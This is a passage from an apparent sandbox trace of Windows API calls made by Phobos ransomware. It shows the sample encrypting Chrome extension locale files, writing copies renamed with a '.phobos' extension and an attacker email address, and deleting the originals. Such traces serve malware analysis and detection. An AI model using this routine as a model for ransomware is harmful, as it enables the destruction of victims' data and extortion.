out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0164.919] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0164.919] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x40db, lpOverlapped=0x0) returned 1 [0165.013] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40e0, dwBufLen=0x40e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40e0) returned 1 [0165.013] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x40e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x40e0, lpOverlapped=0x0) returned 1 [0165.014] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0165.014] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.014] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0165.015] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.015] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0165.015] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.015] CloseHandle (hObject=0x138) returned 1 [0165.015] CloseHandle (hObject=0x194) returned 1 [0165.015] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json")) returned 1 [0165.016] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0165.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0165.018] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16637) returned 1 [0165.018] CloseHandle (hObject=0x194) returned 1 [0165.018] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json")) returned 0x2020 [0165.018] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0165.018] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.018] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.019] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0165.019] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.019] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x40fd, lpOverlapped=0x0) returned 1 [0165.025] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4100, dwBufLen=0x4100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4100) returned 1 [0165.025] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4100, lpOverlapped=0x0) returned 1 [0165.026] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0165.026] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.026] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0165.026] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.026] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0165.026] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.026] CloseHandle (hObject=0x194) returned 1 [0165.026] CloseHandle (hObject=0x138) returned 1 [0165.027] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\messages.json")) returned 1 [0165.027] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0165.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.028] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=18881) returned 1 [0165.028] CloseHandle (hObject=0x138) returned 1 [0165.028] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json")) returned 0x2020 [0165.028] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.028] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.028] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0165.029] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0165.029] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.029] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x49c1, lpOverlapped=0x0) returned 1 [0165.031] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x49d0, dwBufLen=0x49d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x49d0) returned 1 [0165.031] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x49d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x49d0, lpOverlapped=0x0) returned 1 [0165.032] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0165.032] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.032] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0165.032] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.032] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0165.032] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.032] CloseHandle (hObject=0x138) returned 1 [0165.032] CloseHandle (hObject=0x194) returned 1 [0165.032] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json")) returned 1 [0165.033] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0165.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0165.034] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16022) returned 1 [0165.034] CloseHandle (hObject=0x194) returned 1 [0165.034] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json")) returned 0x2020 [0165.034] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0165.034] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.034] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.035] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0165.035] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.035] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3e96, lpOverlapped=0x0) returned 1 [0165.058] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3ea0, dwBufLen=0x3ea0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3ea0) returned 1 [0165.058] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3ea0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3ea0, lpOverlapped=0x0) returned 1 [0165.059] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0165.059] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.060] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0165.060] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.060] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0165.060] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.060] CloseHandle (hObject=0x194) returned 1 [0165.060] CloseHandle (hObject=0x138) returned 1 [0165.060] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json")) returned 1 [0165.061] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0165.061] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.063] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=22077) returned 1 [0165.063] CloseHandle (hObject=0x138) returned 1 [0165.064] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json")) returned 0x2020 [0165.064] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0165.064] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.064] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0165.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0165.064] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0165.064] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.064] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x563d, lpOverlapped=0x0) returned 1 [0165.152] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5640, dwBufLen=0x5640 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5640) returned 1 [0165.152] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5640, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5640, lpOverlapped=0x0) returned 1 [0165.218] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0165.223] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0165.223] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, 